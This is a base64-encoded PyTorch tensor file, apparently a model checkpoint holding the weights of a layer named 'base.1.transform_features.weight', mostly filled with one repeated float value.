U8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAAHE0hXE1UnE2SwBLZEtkhnE3S2RLAYZxOIloAilScTl0cTpScTtYIAAAAGJhc2UuMS50cmFuc2Zvcm1fZmVhdHVyZXMud2VpZ2h0cTxoBShoBkL8BAAAgAKKCmz8nEb5IGqoUBkugAJN6QMugAJ9cQAoWBAAAABwcm90b2NvbF92ZXJzaW9ucQFN6QNYDQAAAGxpdHRsZV9lbmRpYW5xAohYCgAAAHR5cGVfc2l6ZXNxA31xBChYBQAAAHNob3J0cQVLAlgDAAAAaW50cQZLBFgEAAAAbG9uZ3EHSwR1dS6AAihYBwAAAHN0b3JhZ2VxAGN0b3JjaApGbG9hdFN0b3JhZ2UKcQFYDgAAADk0NTAzNjI0NTg1NTIwcQJYAwAAAGNwdXEDTQABTnRxBFEugAJdcQBYDgAAADk0NTAzNjI0NTg1NTIwcQFhLgABAAAAAAAA/hOsPokmzL0JJpS9CY1pPkS44r6rnYy+ZBtau4u9MTxd+Aq+riQfvjHQ/r3ZuZ6+JmHQPLtCuT3MSik+SMBfvnFkAb4ZZja+6D0tveQPmr0DFK++Zv/6PR/2xj5lfR2+f4M7vN+Xvj2OcBi+f+AWPu6FKD7v42G+BRTYPYQhm70PYai+PNorPaOQAz7X+7W+F8+8PjWFvb2p9fc96RXuvZVpcL39psQ9Xo2Uvh72bz4CYw2/D+VxvrN3ND7Yq1C+0wqqPbNgPr7Tm7i+THfSPcCWJ77DLE2+0mzGvVTIoT13jCG9rHJAvraNCz4bd109oJ8jPvwUjb5Ha1S9kTeDvh9a1Typwoe9TfAePlhFkT7RnVO+tmgAvPLx3j2Jt4A+ZNiPPtzyez6+0P4+TvCePbvoWr4zMDg+avEGvj5ABz9YUPu9AWHCvWLeJD6wfxq++Hg/PmvNtL2UCpK+1iyNPOmXm76H7Dq+3JHXvbDzaj5a41E+xKGCPtxQAz1sgmW9SnlBPSTVar20e0m9sTCgvmNpcz1FGCA+CAiMvGb8nz3TXla+hQJvvW7jVb0DK8q+JrG2vt8UAD3DNJo9vuS6vDkOeL08arg+tglFOiQVnr4ONXQ+ulohPzhboLsaE48+GyIZPRDXL73sp1g+B5BVvuwoED99JU4+ExktPk43Kb9aYK69l5EnvhLy9jwtp/a+6xsePuhBmbzvIO8+70rLvWrIub1Z91O9TrEyvuUuVT5YkJ+91M0ovTXSJD+RUtq+KfK1vmIGVb3Mpoa+0T+hvi7Y0r1TSqc9BLccvroYU751JJ0+aNcvPV27RT7MOha9zFp+PHS2gj5dzw++5uNWvnCurDxKS9c+yCgkvvuyZ7480ZM+m9DEvRNiV76S0Iu96zInPhZUpTxmumc+QZ1DPnbMnL6V1ME+spg3PSzf/D7bXpg9IfgmPywRKT7qy2Q+y4T5PapuFTygjQA9R9YvO3PMfT3s8Do+FofMPfBI9Lx6aLu+/w1MPEpWyL4/aKO87SFqvtAPDz4ZAQ28wsoGvaSztL3RGBw+DR1UPoKGuj6yu74+Jpd8PSrAgrzVdZ4+hHtqvsyDJT57GLM9Y9itPqlFQT7KmpO9Di6gPlOhoj0nRw8/2LyfPlP8LLxs9Nq+ZIW6vhUJjD1O2mO+7sADv5K33j4DGg6+tqJlvhsRpj0egJc+uANKPg7RqT3XjK++JiZFvl4Rvz68htg7G+WyPlzooT5UIyG+pTYGPqYdur3aTPm9wqOwPsIGgjxaFsK9bGcXPfK1PT0VXny7zu4Bvibzxz7cZ609Unn0O4ifdj0gmBi+E2L